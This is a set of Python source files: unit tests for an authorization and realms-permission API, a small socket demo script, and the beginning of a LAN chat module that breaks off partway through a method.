def test_get_process_auth_db_expiration(self):
"""Ensure get_process_auth_db() respects expiration."""
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# It doesn't expire for some time.
self.set_time(api.get_process_cache_expiration_sec() - 1)
self.set_fetched_auth_db(auth_db_v1)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# But eventually it does.
self.set_time(api.get_process_cache_expiration_sec() + 1)
self.set_fetched_auth_db(auth_db_v1)
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_process_auth_db_known_version(self):
"""Ensure get_process_auth_db() respects entity group version."""
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v0_again = new_auth_db(replication_state=mock_replication_state(0))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Make the cache expire, and set up fetch_auth_db to return a new instance of
# AuthDB with the same entity group version. The old known instance of AuthDB
# should be reused.
self.set_time(api.get_process_cache_expiration_sec() + 1)
self.set_fetched_auth_db(auth_db_v0_again)
self.assertTrue(api.get_process_auth_db() is auth_db_v0)
def test_get_process_auth_db_multithreading(self):
"""Ensure get_process_auth_db() plays nice with multiple threads."""
def run_in_thread(func):
"""Runs |func| in a parallel thread, returns future (as Queue)."""
result = queue.Queue()
thread = threading.Thread(target=lambda: result.put(func()))
thread.start()
return result
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Run initial fetch, should cache |auth_db_v0| in process cache.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Make process cache expire.
self.set_time(api.get_process_cache_expiration_sec() + 1)
# Start fetching AuthDB from another thread; at some point it will call
# 'fetch_auth_db', where we pause that thread and resume the main thread.
fetching_now = threading.Event()
auth_db_queue = queue.Queue()
def mock_fetch_auth_db(**_kwargs):
fetching_now.set()
return auth_db_queue.get()
self.mock(api, 'fetch_auth_db', mock_fetch_auth_db)
future = run_in_thread(api.get_process_auth_db)
# Wait for internal thread to call |fetch_auth_db|.
fetching_now.wait()
# Ok, now main thread is unblocked, while internal thread is blocking on an
# artificially slow 'fetch_auth_db' call. Main thread can now try to get
# AuthDB via get_process_auth_db(). It should get older stale copy right
# away.
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Finish background 'fetch_auth_db' call by returning 'auth_db_v1'.
# That's what internal thread should get as result of 'get_process_auth_db'.
auth_db_queue.put(auth_db_v1)
self.assertEqual(auth_db_v1, future.get())
# Now main thread should get it as well.
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_process_auth_db_exceptions(self):
"""Ensure get_process_auth_db() handles DB exceptions well."""
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Make process cache expire.
self.set_time(api.get_process_cache_expiration_sec() + 1)
# Emulate an exception in fetch_auth_db.
def mock_fetch_auth_db(**_kwargs):
raise Exception('Boom!')
self.mock(api, 'fetch_auth_db', mock_fetch_auth_db)
# Capture calls to logging.exception.
logger_calls = []
self.mock(api.logging, 'exception', lambda *_args: logger_calls.append(1))
# Should return older copy of auth_db_v0 and log the exception.
self.assertEqual(auth_db_v0, api.get_process_auth_db())
self.assertEqual(1, len(logger_calls))
# Make fetch_auth_db work again. Verify get_process_auth_db() works too.
self.set_fetched_auth_db(auth_db_v1)
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_latest_auth_db(self):
"""Ensure get_latest_auth_db "rushes" cached AuthDB update."""
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Rig up fetch_auth_db to return a newer version.
self.set_fetched_auth_db(auth_db_v1)
# 'get_process_auth_db' still returns the cached one.
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# But 'get_latest_auth_db' returns a new one and updates the cached copy.
self.assertEqual(auth_db_v1, api.get_latest_auth_db())
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_request_auth_db(self):
"""Ensure get_request_auth_db() caches AuthDB in request cache."""
api.reinitialize_request_cache()
# 'get_request_auth_db()' returns whatever get_process_auth_db() returns
# when called for the first time.
self.mock(api, 'get_process_auth_db', lambda: 'fake')
self.assertEqual('fake', api.get_request_auth_db())
# But then it caches it locally and reuses local copy, instead of calling
# 'get_process_auth_db()' all the time.
self.mock(api, 'get_process_auth_db', lambda: 'another-fake')
self.assertEqual('fake', api.get_request_auth_db())
def test_warmup(self):
"""Ensure api.warmup() fetches AuthDB into process-global cache."""
self.assertFalse(api._auth_db)
api.warmup()
self.assertTrue(api._auth_db)
class ApiTest(test_case.TestCase):
"""Test for publicly exported API."""
def setUp(self):
super(ApiTest, self).setUp()
api.reset_local_state()
def test_get_current_identity_unitialized(self):
"""If request cache is not initialized, returns Anonymous."""
self.assertEqual(api.get_current_identity(), model.Anonymous)
def test_get_current_identity(self):
"""Ensure get_current_identity returns whatever was put in request cache."""
ident = model.Identity.from_bytes('user:abc@example.com')
api.get_request_cache().current_identity = ident
self.assertEqual(ident, api.get_current_identity())
def test_require_decorator_ok(self):
"""@require calls the callback and then decorated function."""
callback_calls = []
def require_callback():
callback_calls.append(1)
return True
@api.require(require_callback)
def allowed(*args, **kwargs):
return (args, kwargs)
self.assertEqual(((1, 2), {'a': 3}), allowed(1, 2, a=3))
self.assertEqual(1, len(callback_calls))
def test_require_decorator_fail(self):
"""@require raises exception and doesn't call decorated function."""
forbidden_calls = []
@api.require(lambda: False)
def forbidden():
forbidden_calls.append(1)
with self.assertRaises(api.AuthorizationError):
forbidden()
self.assertFalse(forbidden_calls)
def test_require_decorator_error_msg(self):
@api.require(lambda: False, 'Forbidden!')
def forbidden():
pass
with self.assertRaisesRegexp(api.AuthorizationError, 'Forbidden!'):
forbidden()
def test_require_decorator_nesting_ok(self):
"""Permission checks are called in order."""
calls = []
def check(name):
calls.append(name)
return True
@api.require(lambda: check('A'))
@api.require(lambda: check('B'))
def allowed(arg):
return arg
self.assertEqual('value', allowed('value'))
self.assertEqual(['A', 'B'], calls)
def test_require_decorator_nesting_first_deny(self):
"""First deny raises AuthorizationError."""
calls = []
def check(name, result):
calls.append(name)
return result
forbidden_calls = []
@api.require(lambda: check('A', False))
@api.require(lambda: check('B', True))
def forbidden(arg):
forbidden_calls.append(1)
with self.assertRaises(api.AuthorizationError):
forbidden('value')
self.assertFalse(forbidden_calls)
self.assertEqual(['A'], calls)
def test_require_decorator_nesting_non_first_deny(self):
"""Non-first deny also raises AuthorizationError."""
calls = []
def check(name, result):
calls.append(name)
return result
forbidden_calls = []
@api.require(lambda: check('A', True))
@api.require(lambda: check('B', False))
def forbidden(arg):
forbidden_calls.append(1)
with self.assertRaises(api.AuthorizationError):
forbidden('value')
self.assertFalse(forbidden_calls)
self.assertEqual(['A', 'B'], calls)
def test_require_decorator_on_method(self):
calls = []
def checker():
calls.append(1)
return True
class Class(object):
@api.require(checker)
def method(self, *args, **kwargs):
return (self, args, kwargs)
obj = Class()
self.assertEqual((obj, ('value',), {'a': 2}), obj.method('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_on_static_method(self):
calls = []
def checker():
calls.append(1)
return True
class Class(object):
@staticmethod
@api.require(checker)
def static_method(*args, **kwargs):
return (args, kwargs)
self.assertEqual((('value',), {'a': 2}), Class.static_method('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_on_class_method(self):
calls = []
def checker():
calls.append(1)
return True
class Class(object):
@classmethod
@api.require(checker)
def class_method(cls, *args, **kwargs):
return (cls, args, kwargs)
self.assertEqual(
(Class, ('value',), {'a': 2}), Class.class_method('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_ndb_nesting_require_first(self):
calls = []
def checker():
calls.append(1)
return True
@api.require(checker)
@ndb.non_transactional
def func(*args, **kwargs):
return (args, kwargs)
self.assertEqual((('value',), {'a': 2}), func('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_ndb_nesting_require_last(self):
calls = []
def checker():
calls.append(1)
return True
@ndb.non_transactional
@api.require(checker)
def func(*args, **kwargs):
return (args, kwargs)
self.assertEqual((('value',), {'a': 2}), func('value', a=2))
self.assertEqual(1, len(calls))
def test_public_then_require_fails(self):
with self.assertRaises(TypeError):
@api.public
@api.require(lambda: True)
def func():
pass
def test_require_then_public_fails(self):
with self.assertRaises(TypeError):
@api.require(lambda: True)
@api.public
def func():
pass
def test_is_decorated(self):
self.assertTrue(api.is_decorated(api.public(lambda: None)))
self.assertTrue(
api.is_decorated(api.require(lambda: True)(lambda: None)))
@mock.patch('logging.info')
def test_require_log_identity(self, logfunc):
ident = model.Identity.from_bytes('user:abc@example.com')
api.get_request_cache().current_identity = ident
@api.require(lambda: True, log_identity=True)
def func():
pass
func()
logfunc.assert_called_once_with('Accessed from user:abc@example.com')
class OAuthAccountsTest(test_case.TestCase):
"""Test for extract_oauth_caller_identity function."""
def mock_all(self, user_email, client_id, allowed_client_ids=()):
class FakeUser(object):
email = lambda _: user_email
class FakeAuthDB(object):
is_allowed_oauth_client_id = lambda _, cid: cid in allowed_client_ids
self.mock(api.oauth, 'get_current_user', lambda _: FakeUser())
self.mock(api.oauth, 'get_client_id', lambda _: client_id)
self.mock(api, 'get_request_auth_db', FakeAuthDB)
@staticmethod
def user(email):
return model.Identity(model.IDENTITY_USER, email)
def test_is_allowed_oauth_client_id_ok(self):
self.mock_all('email@email.com', 'some-client-id', ['some-client-id'])
self.assertEqual(
(self.user('email@email.com'), api.new_auth_details()),
api.extract_oauth_caller_identity())
def test_is_allowed_oauth_client_id_not_ok(self):
self.mock_all('email@email.com', 'some-client-id', ['another-client-id'])
with self.assertRaises(api.AuthorizationError):
api.extract_oauth_caller_identity()
def test_is_allowed_oauth_client_id_not_ok_empty(self):
self.mock_all('email@email.com', 'some-client-id')
with self.assertRaises(api.AuthorizationError):
api.extract_oauth_caller_identity()
class AuthWebUIConfigTest(test_case.TestCase):
def test_works(self):
utils.clear_cache(api.get_web_client_id)
self.assertEqual('', api.get_web_client_id_uncached())
api.set_web_client_id('zzz')
self.assertEqual('zzz', api.get_web_client_id_uncached())
self.assertEqual('zzz', api.get_web_client_id())
class AuthDBBuilder(object):
def __init__(self):
self.groups = []
def group(self, name, members=None, globs=None, nested=None, owners=None):
self.groups.append(model.AuthGroup(
key=model.group_key(name),
members=[model.Identity.from_bytes(m) for m in (members or [])],
globs=[model.IdentityGlob.from_bytes(g) for g in (globs or [])],
nested=nested or [],
owners=owners or 'default-owners-group',
))
return self
def build(self):
return new_auth_db(groups=self.groups)
class RelevantSubgraphTest(test_case.TestCase):
def call(self, db, principal):
if '*' in principal:
principal = model.IdentityGlob.from_bytes(principal)
elif '@' in principal:
principal = model.Identity.from_bytes(principal)
graph = db.get_relevant_subgraph(principal)
# Use a dict with integer keys instead of a list to improve the readability
# of assertions below.
nodes = {}
for i, (node, edges) in enumerate(graph.describe()):
if isinstance(node, (model.Identity, model.IdentityGlob)):
node = node.to_bytes()
nodes[i] = (node, {l: sorted(s) for l, s in edges.items() if s})
return nodes
def test_empty(self):
db = AuthDBBuilder().build()
self.assertEqual(
{0: ('user:a@example.com', {})}, self.call(db, 'user:a@example.com'))
self.assertEqual(
{0: ('user:*@example.com', {})}, self.call(db, 'user:*@example.com'))
# In the case of a nonexistent group, an empty graph is returned.
self.assertEqual({}, self.call(db, 'group'))
def test_identity_discoverable_directly_and_through_glob(self):
b = AuthDBBuilder()
b.group('g1', ['user:a@example.com'])
b.group('g2', ['user:b@example.com'])
b.group('g3', [], ['user:*@example.com'])
b.group('g4', ['user:a@example.com'], ['user:*'])
self.assertEqual({
0: ('user:a@example.com', {'IN': [1, 3, 4, 5]}),
1: ('user:*@example.com', {'IN': [2]}),
2: ('g3', {}),
3: ('user:*', {'IN': [4]}),
4: ('g4', {}),
5: ('g1', {}),
}, self.call(b.build(), 'user:a@example.com'))
def test_glob_is_matched_directly(self):
b = AuthDBBuilder()
b.group('g1', [], ['user:*@example.com'])
b.group('g2', [], ['user:*'])
self.assertEqual({
0: ('user:*@example.com', {'IN': [1]}),
1: ('g1', {}),
}, self.call(b.build(), 'user:*@example.com'))
def test_simple_group_lookup(self):
b = AuthDBBuilder()
b.group('g1', nested=['g2', 'g3'])
b.group('g2', nested=['g3'])
b.group('g3')
self.assertEqual({
0: ('g3', {'IN': [1, 2]}),
1: ('g1', {}),
2: ('g2', {'IN': [1]}),
}, self.call(b.build(), 'g3'))
def test_ownership_relations(self):
b = AuthDBBuilder()
b.group('a-root', nested=['b-inner'])
b.group('b-inner')
b.group('c-owned-by-root', owners='a-root')
b.group('d-includes-owned-by-root', nested=['c-owned-by-root'])
b.group('e-owned-by-3', owners='d-includes-owned-by-root')
self.assertEqual({
0: ('b-inner', {'IN': [1]}),
1: ('a-root', {'OWNS': [2]}),
2: ('c-owned-by-root', {'IN': [3]}),
3: ('d-includes-owned-by-root', {'OWNS': [4]}),
4: ('e-owned-by-3', {}),
}, self.call(b.build(), 'b-inner'))
def test_diamond(self):
b = AuthDBBuilder()
b.group('top', nested=['middle1', 'middle2'])
b.group('middle1', nested=['bottom'])
b.group('middle2', nested=['bottom'])
b.group('bottom')
self.assertEqual({
0: ('bottom', {'IN': [1, 3]}),
1: ('middle1', {'IN': [2]}),
2: ('top', {}),
3: ('middle2', {'IN': [2]}),
}, self.call(b.build(), 'bottom'))
def test_cycle(self):
# Note: cycles in groups are forbidden at the API layer, but make sure we still
# handle them without hanging in case something unexpected happens and they
# appear.
b = AuthDBBuilder()
b.group('g1', nested=['g2'])
b.group('g2', nested=['g1', 'g2'])
self.assertEqual({
0: ('g2', {'IN': [0, 1]}),
1: ('g1', {'IN': [0]}),
}, self.call(b.build(), 'g2'))
def test_selfowners(self):
b = AuthDBBuilder()
b.group('g1', nested=['g2'], owners='g1')
b.group('g2')
self.assertEqual({0: ('g1', {'OWNS': [0]})}, self.call(b.build(), 'g1'))
self.assertEqual({
0: ('g2', {'IN': [1]}),
1: ('g1', {'OWNS': [1]}),
}, self.call(b.build(), 'g2'))
def test_messy_graph(self):
b = AuthDBBuilder()
b.group('directly', ['user:a@example.com'])
b.group('via-glob', [], ['user:*@example.com'])
b.group('g1', nested=['via-glob'], owners='g2')
b.group('g2', nested=['directly'])
b.group('g3', nested=['g1'])
self.assertEqual({
0: ('user:a@example.com', {'IN': [1, 5]}),
1: ('user:*@example.com', {'IN': [2]}),
2: ('via-glob', {'IN': [3]}),
3: ('g1', {'IN': [4]}),
4: ('g3', {}),
5: ('directly', {'IN': [6]}),
6: ('g2', {'OWNS': [3]}),
}, self.call(b.build(), 'user:a@example.com'))
class PermissionsTest(test_case.TestCase):
def test_happy_path(self):
p1 = api.Permission('service.subject.verb')
p2 = api.Permission('service.subject.verb')
p3 = api.Permission('service.subject.another')
self.assertEqual(p1, p2)
self.assertTrue(p1 is p2)
self.assertNotEqual(p1, p3)
self.assertEqual('service.subject.verb', str(p1))
self.assertEqual("'service.subject.verb'", '%r' % (p1,))
def test_validation_errors(self):
with self.assertRaises(TypeError):
api.Permission(123)
with self.assertRaises(TypeError):
api.Permission(u'no.unicode.here')
with self.assertRaises(ValueError):
api.Permission('too.few')
with self.assertRaises(ValueError):
api.Permission('too.too.too.much')
with self.assertRaises(ValueError):
api.Permission('has..empty')
class RealmStringsTest(test_case.TestCase):
def test_happy_path(self):
self.assertEqual(api.root_realm('proj'), 'proj:@root')
self.assertEqual(api.root_realm(u'proj'), 'proj:@root')
self.assertEqual(api.legacy_realm('proj'), 'proj:@legacy')
self.assertEqual(api.legacy_realm(u'proj'), 'proj:@legacy')
def test_validation_errors(self):
with self.assertRaises(TypeError):
api.root_realm(None)
with self.assertRaises(TypeError):
api.legacy_realm(None)
with self.assertRaises(ValueError):
api.root_realm('')
with self.assertRaises(ValueError):
api.legacy_realm('')
def test_validate_realm_name(self):
self.assertIsNone(api.validate_realm_name('proj:realm'))
self.assertIsNone(api.validate_realm_name('proj:@root'))
self.assertIsNone(api.validate_realm_name('proj:@legacy'))
self.assertIsNone(api.validate_realm_name('@internal:realm'))
self.assertIsNone(api.validate_realm_name('@internal:@root'))
self.assertIsNone(api.validate_realm_name('@internal:@legacy'))
def test_validate_realm_name_errors(self):
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('realm'))
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('proj:@invalid'))
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('proj:re:alm'))
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('@proj:realm'))
PERM0 = api.Permission('luci.dev.testing0')
PERM1 = api.Permission('luci.dev.testing1')
PERM2 = api.Permission('luci.dev.testing2')
ALL_PERMS = [PERM0, PERM1, PERM2]
ID1 = model.Identity.from_bytes('user:1@example.com')
ID2 = model.Identity.from_bytes('user:2@example.com')
ID3 = model.Identity.from_bytes('user:3@example.com')
ADMIN = model.Identity.from_bytes('user:admin@example.com')
class RealmsTest(test_case.TestCase):
@staticmethod
def auth_db(realms_map, groups=None, conditions=None, api_version=None):
return api.AuthDB.from_proto(
replication_state=model.AuthReplicationState(),
auth_db=replication_pb2.AuthDB(
groups=[
{
'name': name,
'members': [m.to_bytes() for m in members],
'created_by': 'user:zzz@example.com',
'modified_by': 'user:zzz@example.com',
} for name, members in (groups or {}).items()
],
realms={
'api_version': api_version or realms.API_VERSION,
'conditions': conditions or [],
'permissions': [
{'name': p.name} for p in ALL_PERMS
],
'realms': [
{
'name': name,
'bindings': [
{
'conditions': conds,
'permissions': [
ALL_PERMS.index(p)
for p in perms
],
'principals': [
p if isinstance(p, str) else p.to_bytes()
for p in principals
],
} for conds, perms, principals in sorted(bindings)
],
'data': {
'enforce_in_service': ['data for %s' % name],
},
} for name, bindings in sorted(realms_map.items())
],
},
),
additional_client_ids=[])
def setUp(self):
super(RealmsTest, self).setUp()
self.all_perms = {p.name: p for p in ALL_PERMS}
self.mock(api, '_all_perms', self.all_perms)
self.logs = {}
for lvl in ('info', 'warning', 'error', 'exception'):
self.logs[lvl] = []
def appender(lvl): # need to capture lvl in a separate closure
return lambda msg, *args: self.logs[lvl].append(msg % args)
self.mock(api.logging, lvl, appender(lvl))
def assert_logs_empty(self, lvl):
self.assertEqual([], self.logs[lvl])
def assert_logs(self, lvl, msg):
self.assertTrue(
any(msg in m for m in self.logs[lvl]),
'%r not in %r' % (msg, self.logs[lvl]))
def assert_check(self, db, perm, realms, ident, attrs, outcome):
self.assertEqual(
outcome, db.has_permission(perm, realms, ident, attributes=attrs),
'has_permission(%r, %r, %r, %r) is %s, but should be %s' %
(perm, realms, ident.to_bytes(), attrs, not outcome, outcome))
def test_direct_inclusion_in_binding(self):
db = self.auth_db({
'proj:@root': [],
'proj:realm': [
([], [PERM0, PERM1], [ID1]),
([], [PERM0, PERM2], [ID2]),
],
'proj:another/realm': [
([], [PERM2], [ID1, ID3]),
],
})
self.assert_check(db, PERM0, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM2, ['proj:realm'], ID1, None, False)
self.assert_check(db, PERM0, ['proj:realm'], ID2, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID2, None, False)
self.assert_check(db, PERM2, ['proj:realm'], ID2, None, True)
self.assert_check(
db, PERM2, ['proj:realm', 'proj:another/realm'], ID1, None, True)
self.assert_check(
db, PERM2, ['proj:realm', 'proj:another/realm'], ID3, None, True)
def test_inclusion_through_group(self):
db = self.auth_db({
'proj:@root': [],
'proj:realm': [
([], [PERM0, PERM1], ['group:empty', 'group:g1']),
([], [PERM0, PERM2], ['group:empty', 'group:g2']),
],
}, groups={'empty': [], 'g1': [ID1], 'g2': [ID2]})
self.assert_check(db, PERM0, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM2, ['proj:realm'], ID1, None, False)
self.assert_check(db, PERM0, ['proj:realm'], ID2, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID2, None, False)
self.assert_check(db, PERM2, ['proj:realm'], ID2, None, True)
def test_conditional_bindings(self):
conditions = [
{'restrict': {'attribute': 'a1', 'values': ['a', 'b']}}, # 0
{'restrict': {'attribute': 'a2', 'values': ['c']}}, # 1
{'restrict': {'attribute': 'a3', 'values': []}}, # 2
{'restrict': {'attribute': 'a1', 'values': ['c']}}, # 3
]
db = self.auth_db({
'p:r': [
([0], [PERM0], [ID1]),
([0, 1], [PERM1], [ID1]),
([0, 2], [PERM2], [ID1]),
([0], [PERM0], [ID2]),
([3], [PERM0], [ID2]),
],
}, conditions=conditions)
# "Restrict" condition works.
self.assert_check(db, PERM0, ['p:r'], ID1, {'a1': 'a'}, True)
self.assert_check(db, PERM0, ['p:r'], ID1, {'a1': 'b'}, True)
self.assert_check(db, PERM0, ['p:r'], ID1, {'a1': 'c'}, False)
self.assert_check(db, PERM0, ['p:r'], ID1, {'xx': 'a'}, False)
self.assert_check(db, PERM0, ['p:r'], ID1, None, False)
# ANDing conditions works.
self.assert_check(db, PERM1, ['p:r'], ID1, {'a1': 'a', 'a2': 'c'}, True)
self.assert_check(db, PERM1, ['p:r'], ID1, {'a1': 'a'}, False)
self.assert_check(db, PERM1, ['p:r'], ID1, {'a2': 'c'}, False)
# Empty restriction is allowed and evaluates to False.
self.assert_check(db, PERM2, ['p:r'], ID1, {'a1': 'a', 'a3': 'c'}, False)
self.assert_check(db, PERM2, ['p:r'], ID1, {'a1': 'a'}, False)
# ORing conditions via multiple bindings.
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'a'}, True) # via 0
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'b'}, True) # via 0
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'c'}, True) # via 3
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'x'}, False)
self.assert_check(db, PERM0, ['p:r'], ID2, None, False)
def test_fallback_to_root(self):
db = self.auth_db({'proj:@root': [([], [PERM0], [ID1])]})
self.assert_check(db, PERM0, ['proj:@root'], ID1, None, True)
self.assert_check(db, PERM0, ['proj:@root'], ID2, None, False)
self.assert_logs_empty('warning')
self.assert_check(db, PERM0, ['proj:realm'], ID1, None, True)
self.assert_logs('warning', 'falling back to the root')
self.assert_check(db, PERM0, ['proj:realm'], ID2, None, False)
self.assert_check(db, PERM0, ['proj:another/realm'], ID1, None, True)
def test_missing_project(self):
db = self.auth_db({})
self.assert_check(db, PERM0, ['proj:@root'], ID1, None, False)
self.assert_logs('warning', 'a non-existing root realm')
self.logs['warning'] = []
self.assert_check(db, PERM0, ['proj:@legacy'], ID1, None, False)
self.assert_logs('warning', 'doesn\'t have a root realm')
self.logs['warning'] = []
self.assert_check(db, PERM0, ['proj:another/realm'], ID1, None, False)
self.assert_logs('warning', 'doesn\'t have a root realm')
self.logs['warning'] = []
def test_unknown_permission(self):
unknown = api.Permission('luci.dev.unknown')
self.all_perms[unknown.name] = unknown
db = self.auth_db({'proj:realm': [([], [PERM0], [ID1])]})
self.assert_logs('warning', 'is not in the AuthDB')
self.assert_check(db, unknown, ['proj:realm'], ID1, None, False)
self.assert_logs('warning', 'not present in the AuthDB')
def test_realms_unavailable(self):
empty = new_auth_db()
with self.assertRaises(api.RealmsError):
empty.has_permission('luci.dev.p1', ['proj:realm'], ID1)
def test_bad_api_version(self):
with self.assertRaises(api.RealmsError):
self.auth_db({}, api_version=666)
def test_bad_permission_type(self):
db = self.auth_db({})
with self.assertRaises(TypeError):
db.has_permission('luci.dev.p1', ['proj:realm'], ID1)
def test_bad_realm_names(self):
db = self.auth_db({})
for r in ['z', ':z', 'p:', 'blah blah:z', 'p:BLAH', 'p:@z', 'p:p:z']:
with self.assertRaises(ValueError):
db.has_permission(PERM0, [r], ID1)
def test_has_permission_dryrun(self):
rc = api.RequestCache()
rc._auth_db = self.auth_db(
{'proj:@root': [([], [PERM0], [ID1])]}, groups={'admin': [ADMIN]})
self.mock(api, 'get_request_cache', lambda: rc)
# Match.
self.logs['info'] = []
api.has_permission_dryrun(
PERM0, ['proj:@root'], True, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('info',
"bug: has_permission_dryrun('luci.dev.testing0', ['proj:@root'], "
"'user:1@example.com'), authdb=0: match - ALLOW")
self.logs['info'] = []
api.has_permission_dryrun(
PERM1, ['proj:@root'], False, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('info',
"bug: has_permission_dryrun('luci.dev.testing1', ['proj:@root'], "
"'user:1@example.com'), authdb=0: match - DENY")
# Mismatch.
self.logs['warning'] = []
api.has_permission_dryrun(
PERM0, ['proj:@root'], False, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('warning',
"bug: has_permission_dryrun('luci.dev.testing0', ['proj:@root'], "
"'user:1@example.com'), authdb=0: mismatch - got ALLOW, want DENY")
self.logs['warning'] = []
api.has_permission_dryrun(
PERM1, ['proj:@root'], True, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('warning',
"bug: has_permission_dryrun('luci.dev.testing1', ['proj:@root'], "
"'user:1@example.com'), authdb=0: mismatch - got DENY, want ALLOW")
# Admin match.
self.logs['info'] = []
api.has_permission_dryrun(
PERM0, ['proj:@root'], True, ADMIN,
admin_group='admin', tracking_bug='bug')
self.assert_logs('info',
"bug: has_permission_dryrun('luci.dev.testing0', ['proj:@root'], "
"'user:admin@example.com'), authdb=0: match - ADMIN_ALLOW")
# Blow up.
self.logs['exception'] = []
api.has_permission_dryrun(
PERM1, ['@root'], True, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('exception',
"bug: has_permission_dryrun('luci.dev.testing1', ['@root'], "
"'user:1@example.com'), authdb=0: exception ValueError, want ALLOW")
def test_realm_data(self):
db = self.auth_db({'proj:@root': [], 'proj:r': []})
def realm_data(realm):
r = db.get_realm_data(realm)
return r.enforce_in_service[0] if r else None
self.assertEqual('data for proj:r', realm_data('proj:r'))
self.assertEqual('data for proj:@root', realm_data('proj:@root'))
self.assertEqual('data for proj:@root', realm_data('proj:zzz'))
self.assertEqual(None, realm_data('zzz:@root'))
if __name__ == '__main__':
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
|
socket-preview-progs.py
|
"""
same socket, but talk between independent programs too, not just threads;
server here runs in a process and serves both process and thread clients;
sockets are machine-global, much like fifos: don't require shared memory
"""
from socket_preview import server, client # both use same port number
import sys, os
from threading import Thread
mode = int(sys.argv[1])
if mode == 1: # run server in this process
server()
elif mode == 2: # run client in this process
client('client:process=%s' % os.getpid())
else: # run 5 client threads in process
for i in range(5):
Thread(target=client, args=('client:thread=%s' % i,)).start()
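# Usage sketch (not part of the original script; assumes socket_preview.server()
# serves forever and socket_preview.client(name) sends a few messages on the
# shared port):
#
#   python socket-preview-progs.py 1     # terminal 1: run the server process
#   python socket-preview-progs.py 2     # terminal 2: run one client process
#   python socket-preview-progs.py 3     # terminal 3: run 5 client threads in one process
#
# Because the socket is bound to a machine-wide port, clients started in separate
# processes reach the same server that the threads do.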
|
chat.py
|
import os
import time
from threading import Thread, Lock
from collections import deque
from . import utils
from . import config
def notice(txt, color=False):
"print notice"
if color:
txt = config.Col.WARNING + txt + config.Col.ENDC
print(txt)
def stats(txt, color=False):
"Print stats"
if color:
txt = config.Col.OKBLUE + txt + config.Col.ENDC
print(txt)
class Node:
def __init__(self, color=False, alert=''):
self.__client_list_lock = Lock()
self.alive = True
self.color = color
self.alert = alert
self.issue_alert = False
addr = utils.get_existing_server_addr()
if self.color:
config.prompt = config.Col.OKGREEN + config.prompt + config.Col.ENDC # lanchat prompt
if addr is None:
self.__make_server()
else:
self.__make_client()
self.name = config.client_name
def run(self):
"""Run self on provided screen"""
notice('Starting output thread', self.color)
o = Thread(target=self.__output_thread, name='output')
o.start()
self.threads.append(o)
try:
notice('Starting input thread', self.color)
self.__input_thread()
except KeyboardInterrupt:
self.__shutdown()
def __listen_thread(self):
if self.mode == 's':
while self.alive:
try:
com, addr = self.__s.accept()
except OSError:
pass
else:
com.setblocking(False)
with self.__client_list_lock:
# prevent list from mutating
# while another thread is iterating
self.clients.append(com)
stats('User count: {}'.format(len(self.clients)), self.color)
def __shutdown(self):
self.alive = False
# wait for threads to exit
notice('\nWaiting for threads to stop.', self.color)
while any(i.is_alive() for i in self.threads):
time.sleep(1)
# send close to everyone
if self.mode == 'c':
notice("Telling server that I'm leaving", self.color)
utils.quit(self.__s)
else: # server
try:
with self.__client_list_lock:
new_server = self.clients.pop()
except IndexError: # nobody was left
pass
else:
# tell the new server to assume
notice('Assigning new server for network', self.color)
utils.assume_server(new_server)
# tell others to quit
notice("Telling everyone I'm leaving", self.color)
with self.__client_list_lock:
for com in self.clients:
utils.quit(com)
notice('LanChat is closing. Use again', self.color)
self.__s.close()
def __get_instructions(self):
"Get info from sockets"
if self.mode == 'c':
